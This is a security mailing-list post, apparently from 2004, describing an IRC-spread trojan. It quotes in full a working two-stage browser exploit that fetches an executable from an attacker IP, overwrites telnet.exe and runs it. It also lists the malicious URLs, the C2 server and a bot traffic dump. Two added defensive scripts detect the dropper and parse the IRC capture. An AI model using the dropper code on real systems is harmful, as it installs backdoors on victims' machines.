New IRC Trojan - Symantec and Trend Micro Unable To Stop Infection

It seems that a new trojan is making the rounds on IRC.
Nobody else seems to have figured it out yet, as there is no antivirus
pattern out.

It seems that things on this list get attention quicker, and my virus case
hasn't even been looked at yet by any AV vendor. I'd like to post what
I've found to speed the process up.

While on IRC, a client posted a link to the following URL.
I was on a fully patched Windows XP SP1 box at the time with an up-to-date
virus scanner (Symantec AV 2004).

I clicked the URL and saw a picture and a mini popup window. I thought it
strange, but nothing more of it at the time.

**THIS URL IS NOT SAFE** DO NOT CLICK
http:-//www.teamwwindy.com/thekiss.jpg
**THIS URL IS NOT SAFE** DO NOT CLICK


*** UPDATE ***
I am seeing this spread from clients posting a new URL today as well:
http:-//www.rvsgroups.com/nfos/DOOM.III-DEViANCE/
** DO NOT GO TO THIS URL UNLESS YOU WANT TO BE INFECTED **

(PS: the links are intentionally broken with a "-" to prevent infection.)


Symantec on the latest pattern detects nothing.
Trend Micro Internet Security detects some sort of JavaScript exploit;
however, in this case the payload still infected the machine running Trend.

The web exploit that installs the payload runs this JavaScript code:
--------------snip ----------------snip-------------------snip-----------------------------------------
// Stage 1: write an IFRAME into the page and, 100 ms later, write a SCRIPT tag
// into that frame which pulls the second stage from the attacker's host.
function getRealShell() {
    myiframe.document.write("<SCRIPT SRC='http://66.119.180.10:8080/shellscript.js'><\/SCRIPT>");
}

document.write("<IFRAME ID=myiframe SRC='about:blank' WIDTH=200 HEIGHT=200></IFRAME>");
setTimeout("getRealShell()",100);

--------------snip ----------------snip-------------------snip-----------------------------------------
The file shellscript(1).js is downloaded; shellscript.js is run and contains
this code:

--------------snip ----------------snip-------------------snip-----------------------------------------
// Stage 2: fetch a.exe with Microsoft.XMLHTTP, write the bytes to disk with
// ADODB.Stream (the ProgID is assembled one character at a time to dodge
// signature matching) over the system telnet.exe, then launch it through the
// telnet:// URL handler.
var downloadurl="http://66.119.180.10:8080/a.exe";
var savetopath;

if(navigator.appVersion.indexOf("Windows NT 5.1")!=-1)
    savetopath="C:\\WINDOWS\\system32\\telnet.exe";   // Windows XP
if(navigator.appVersion.indexOf("Windows NT 5.0")!=-1)
    savetopath="C:\\WINNT\\system32\\telnet.exe";     // Windows 2000

payloadURL = downloadurl;
var x = new ActiveXObject("Microsoft.XMLHTTP");
x.Open("GET",payloadURL,0);   // synchronous GET of the binary
x.Send();

function bla() { return "A" + "D" + "O" + "D" + "B" + "." + "S" + "t" + "r" + "e" + "a" + "m"; }

var s = new ActiveXObject(bla());   // "ADODB.Stream"
s.Mode = 3;                         // adModeReadWrite
s.Type = 1;                         // adTypeBinary
s.Open();
s.Write(x.responseBody);
s.SaveToFile(savetopath,2);         // adSaveCreateOverWrite: clobber telnet.exe

location.href = "telnet://";        // protocol handler runs the replaced telnet.exe

--------------snip ----------------snip-------------------snip-----------------------------------------
At this point I see a telnet.exe process in the task manager. This is the
a.exe file that was downloaded by shellscript.js, moved to
c:\windows\telnet.exe or telnet.bak

(something to do with Windows File Protection, I believe).

(Note that a registry key was also made to rename telnet.bak to telnet.exe on
the next boot, giving you a version of telnet that is actually a backdoor.)
(There is also a RunOnce registry key made for msmsgr.exe, which is also just
a copy of the a.exe file that the earlier JavaScript exploit copied up.)

Now, once the payload has executed (a.exe or telnet.exe), it connects to this
IRC server: 66-119-180-10.van.zoolink.com:6667
Here's a sniffer dump of the first few seconds.

NICK zapvc
USER zxayd 0 0 :zapvc
:irc.server NOTICE zapvc :*** If you are having problems connecting due to ping timeouts, please type /quote pong 81863547 or /raw pong 81863547 now.
PING :81863547
PONG 81863547
:IRC!IRC@xxxxxxxxxx PRIVMSG zapvc :VERSION
:irc.server 001 zapvc :Welcome to the Private IRC Network zapvc!zxayd@xxxxxxxxxxxxxxxxxxxx
:irc.server 002 zapvc :Your host is irc.server, running version Unreal3.2-beta19
:irc.server 003 zapvc :This server was created Mon Jan 12 15:18:40 2004
:irc.server 004 zapvc irc.server Unreal3.2-beta19 iowghraAsORTVSxNCWqBzvdHtGp lvhopsmntikrRcaqOALQbSeKVfMGCuzN
:irc.server 005 zapvc MAP KNOCK SAFELIST HCN MAXCHANNELS=5 MAXBANS=60 NICKLEN=30 TOPICLEN=307 KICKLEN=307 MAXTARGETS=20 AWAYLEN=307 :are supported by this server
:irc.server 005 zapvc WALLCHOPS WATCH=128 SILENCE=5 MODES=12 CHANTYPES=# PREFIX=(qaohv)~&@%+ CHANMODES=be,kfL,l,psmntirRcOAQKVGCuzNSM NETWORK=Private CASEMAPPING=ascii :are supported by this server
:irc.server 251 zapvc :There are 922 users and 2 invisible on 1 servers
:irc.server 254 zapvc 5 :channels formed
:irc.server 255 zapvc :I have 924 clients and 0 servers
:irc.server 265 zapvc :Current Local Users: 924  Max: 1719
:irc.server 266 zapvc :Current Global Users: 924  Max: 926
JOIN #desk
:irc.server 422 zapvc :MOTD File is missing
USERHOST zapvc
JOIN #desk
USERHOST zapvc
JOIN #desk
USERHOST zapvc
:zapvc!zxayd@ip68-2-130-81.@mydomain.changed.com JOIN :#desk
:irc.server 332 zapvc #desk :.mirc spread stop
:irc.server 333 zapvc #desk spn 1087025036
:irc.server 353 zapvc @ #desk :zapvc @spn @_p_
:irc.server 366 zapvc #desk :End of /NAMES list.
PRIVMSG #desk :
:irc.server 302 zapvc :zapvc=+zxayd@xxxxxxxxxxxxxxxxxxxx
:irc.server 302 zapvc :zapvc=+zxayd@xxxxxxxxxxxxxxxxxxxx
:irc.server 302 zapvc :zapvc=+zxayd@xxxxxxxxxxxxxxxxxxxx
:irc.server 412 zapvc :No text to send

If I manually join #desk:
------------------------------------------------------------------------------------------------------
You are now talking on #desk
--- Topic for #desk is .mirc spread stop
--- Topic for #desk set by spn at Sat Jun 12 00:23:56

From the topic it looks like ".mirc spread stop" is a remote control command
to stop the spread. I am unsure what other commands are available to those
who are controlling the trojan.

It is hijacking the mIRC client of the infected person and using this
functionality to spread by messaging clients with the URL of the website
from which the infection occurs.

As of this morning the channel #desk is unoccupied. The IRC server is still
up, with no public channels and a client connection count of about 800.

I submitted samples to Trend Micro, and wanted to submit to Symantec, but
their submission process is overly complicated; since I no longer had their
product installed, I couldn't submit samples.

The abuse departments where the web page resides, as well as where the IRC
server resides, have been contacted, but no action has been taken thus far.
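Added example, not part of the original post: a small static scanner for the two-stage dropper quoted above. The only obfuscation in shellscript.js is the bla() function that builds "ADODB.Stream" from single-character literals, which is enough to defeat a plain substring signature; folding adjacent string literals back together before matching makes the ProgID, the SaveToFile call and the telnet:// launch visible as one drop-and-execute chain. The indicator names, the foldStringConcat heuristic (a regex, not a JavaScript parser) and the benign control snippet are my own; the two samples are the scripts as quoted in the post.

```javascript
// Added example (not code from the original post): static scanner for the
// XMLHTTP -> ADODB.Stream -> SaveToFile -> URL-handler drop-and-execute chain.
"use strict";

// Fold runs of adjacent string literals joined by '+' ("A" + "D" -> "AD").
// Heuristic, not a JS parser: literals containing backslash escapes are skipped.
function foldStringConcat(src) {
  const lit = `"[^"\\\\]*"|'[^'\\\\]*'`;
  const pair = new RegExp(`(${lit})\\s*\\+\\s*(${lit})`, "g");
  let prev;
  do {
    prev = src;
    src = src.replace(pair, (m, a, b) => JSON.stringify(a.slice(1, -1) + b.slice(1, -1)));
  } while (src !== prev);
  return src;
}

// One entry per link in the chain seen in the quoted scripts (names are mine).
const INDICATORS = [
  { name: "XMLHTTP fetch",   re: /Microsoft\.XMLHTTP/i },
  { name: "ADODB.Stream",    re: /ADODB\.Stream/i },
  { name: "SaveToFile",      re: /\.SaveToFile\s*\(/i },
  { name: "system32 target", re: /\\+(?:WINDOWS|WINNT)\\+system32\\+/i },
  { name: "protocol launch", re: /location\.href\s*=\s*["'][a-z]+:\/\//i },
  { name: "injected tag",    re: /document\.write\s*\(\s*["']<(?:SCRIPT|IFRAME)/i },
];

function scanScript(src) {
  const decoded = foldStringConcat(src);
  const hits = INDICATORS.filter(i => i.re.test(decoded)).map(i => i.name);
  const urls = decoded.match(/https?:\/\/[^\s"'<>]+/g) || [];
  // Windows paths appear as "C:\\WINDOWS\\..." in source; undouble the backslashes.
  const paths = [...decoded.matchAll(/["']([A-Za-z]:\\\\[^"']+)["']/g)]
    .map(m => m[1].replace(/\\\\/g, "\\"));
  const dropAndExecute = ["XMLHTTP fetch", "ADODB.Stream", "SaveToFile"]
    .every(h => hits.includes(h));
  return { hits, urls, paths, dropAndExecute };
}

// Samples: the two scripts as quoted in the post (raw, so backslashes survive).
const STAGE1_JS = String.raw`
function getRealShell() {
    myiframe.document.write("<SCRIPT SRC='http://66.119.180.10:8080/shellscript.js'><\/SCRIPT>");
}
document.write("<IFRAME ID=myiframe SRC='about:blank' WIDTH=200 HEIGHT=200></IFRAME>");
setTimeout("getRealShell()",100);
`;

const SHELLSCRIPT_JS = String.raw`
var downloadurl="http://66.119.180.10:8080/a.exe";
if(navigator.appVersion.indexOf("Windows NT 5.1")!=-1)
savetopath="C:\\WINDOWS\\system32\\telnet.exe";
if(navigator.appVersion.indexOf("Windows NT 5.0")!=-1)
savetopath="C:\\WINNT\\system32\\telnet.exe";
payloadURL = downloadurl;
var x = new ActiveXObject("Microsoft.XMLHTTP");
x.Open("GET",payloadURL,0);
x.Send();
function bla() { return "A" + "D" + "O" + "D" + "B" + "." + "S" + "t" + "r"
+ "e" + "a" + "m"; }
var s = new ActiveXObject(bla());
s.Mode = 3;
s.Type = 1;
s.Open();
s.Write(x.responseBody);
s.SaveToFile(savetopath,2);
location.href = "telnet://";
`;

// Constructed benign control: string concatenation by itself is not an indicator.
const BENIGN_JS = `var greeting = "Hello, " + "world"; document.title = greeting;`;

function main() {
  for (const [label, src] of [["stage1", STAGE1_JS], ["shellscript.js", SHELLSCRIPT_JS], ["benign", BENIGN_JS]]) {
    const r = scanScript(src);
    console.log(label, r.dropAndExecute ? "DROP-AND-EXECUTE" : "no chain", r.hits, r.urls, r.paths);
  }
}
main();
```

The raw shellscript.js never contains the text "ADODB.Stream", which is why a pattern written against that string misses it; after folding, all three of XMLHTTP, ADODB.Stream and SaveToFile are present and the scanner reports the chain together with the download URL and the drop path.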
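Added example, not part of the original post: a minimal IRC line parser and a summariser that pulls the command-and-control indicators out of a capture like the sniffer dump above. It splits each line into prefix, command, parameters and trailing text (RFC 1459 framing), treats prefix-less lines as what the bot sent, and records the bot's nick and ident, the server software from the 004 reply, the user count from 251, the channel joined, and the topic and its setter from 332/333, flagging a topic that reads like a command. The flag heuristics and the function names are mine; the sample lines are taken from the dump in the post, with the wrapped lines rejoined.

```javascript
// Added example (not code from the original post): parse an IRC capture and
// summarise the C2 indicators (nick, server version, channel, topic-as-command).
"use strict";

// RFC 1459 framing: [":" prefix SPACE] command {SPACE param} [SPACE ":" trailing]
function parseIrc(line) {
  let rest = line.trim();
  let prefix = null;
  if (rest.startsWith(":")) {
    const sp = rest.indexOf(" ");
    if (sp === -1) return { prefix: rest.slice(1), command: undefined, params: [], trailing: null };
    prefix = rest.slice(1, sp);
    rest = rest.slice(sp + 1);
  }
  let trailing = null;
  const t = rest.indexOf(" :");
  if (t !== -1) {
    trailing = rest.slice(t + 2);   // may legitimately be "" (PRIVMSG #desk :)
    rest = rest.slice(0, t);
  }
  const [command, ...params] = rest.split(/\s+/).filter(Boolean);
  return { prefix, command, params, trailing };
}

function summarize(lines) {
  const s = { nick: null, ident: null, serverVersion: null, users: null,
              channels: [], topics: {}, topicSetBy: {}, clientSends: {}, flags: [] };
  const addChannel = c => { if (c && !s.channels.includes(c)) s.channels.push(c); };
  for (const line of lines) {
    const m = parseIrc(line);
    if (!m.command) continue;
    if (m.prefix === null) {                 // no prefix: sent by the client (the bot)
      s.clientSends[m.command] = (s.clientSends[m.command] || 0) + 1;
      if (m.command === "NICK") s.nick = m.params[0];
      if (m.command === "USER") s.ident = m.params[0];
      if (m.command === "JOIN") addChannel(m.params[0] || m.trailing);
      if (m.command === "PRIVMSG" && m.trailing === "")
        s.flags.push(`empty PRIVMSG sent to ${m.params[0]}`);
      continue;
    }
    switch (m.command) {
      case "004": s.serverVersion = m.params[2]; break;            // <nick> <server> <version> ...
      case "251": { const u = /(\d+) users/.exec(m.trailing || ""); if (u) s.users = Number(u[1]); break; }
      case "332": s.topics[m.params[1]] = m.trailing; break;      // <nick> <channel> :<topic>
      case "333": s.topicSetBy[m.params[1]] = m.params[2]; break; // <nick> <channel> <setter> <ts>
      case "JOIN": addChannel(m.params[0] || m.trailing); break;
    }
  }
  for (const [chan, topic] of Object.entries(s.topics)) {
    if (/^[.!]\w+/.test(topic)) s.flags.push(`topic of ${chan} reads like a bot command: "${topic}"`);
  }
  if ((s.clientSends.JOIN || 0) > 1) s.flags.push(`JOIN repeated ${s.clientSends.JOIN} times in quick succession`);
  return s;
}

// Lines from the sniffer dump in the post (host masked as in the post).
const SNIFFER_DUMP = `
NICK zapvc
USER zxayd 0 0 :zapvc
:irc.server NOTICE zapvc :*** If you are having problems connecting due to ping timeouts, please type /quote pong 81863547 or /raw pong 81863547 now.
PING :81863547
PONG 81863547
:IRC!IRC@xxxxxxxxxx PRIVMSG zapvc :VERSION
:irc.server 001 zapvc :Welcome to the Private IRC Network zapvc!zxayd@xxxxxxxxxxxxxxxxxxxx
:irc.server 004 zapvc irc.server Unreal3.2-beta19 iowghraAsORTVSxNCWqBzvdHtGp lvhopsmntikrRcaqOALQbSeKVfMGCuzN
:irc.server 251 zapvc :There are 922 users and 2 invisible on 1 servers
JOIN #desk
:irc.server 422 zapvc :MOTD File is missing
USERHOST zapvc
JOIN #desk
USERHOST zapvc
JOIN #desk
:zapvc!zxayd@ip68-2-130-81.@mydomain.changed.com JOIN :#desk
:irc.server 332 zapvc #desk :.mirc spread stop
:irc.server 333 zapvc #desk spn 1087025036
:irc.server 353 zapvc @ #desk :zapvc @spn @_p_
:irc.server 366 zapvc #desk :End of /NAMES list.
PRIVMSG #desk :
:irc.server 412 zapvc :No text to send
`.split("\n").map(l => l.trim()).filter(Boolean);

function main() {
  const s = summarize(SNIFFER_DUMP);
  console.log(JSON.stringify(s, null, 2));
}
main();
```

Run against the dump, the summary names the bot as zapvc/zxayd on an Unreal3.2-beta19 server with 922 users, joined to #desk whose topic ".mirc spread stop" (set by spn) is flagged as command-like, which is the picture the post draws from reading the raw lines.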